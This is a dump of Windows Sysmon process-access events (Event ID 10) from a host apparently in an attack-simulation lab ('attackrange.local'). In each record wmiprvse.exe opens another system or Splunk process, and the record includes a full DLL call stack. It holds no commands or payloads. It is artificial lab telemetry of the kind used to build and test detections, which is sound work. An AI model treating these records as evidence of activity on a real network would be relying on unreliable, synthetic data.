15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 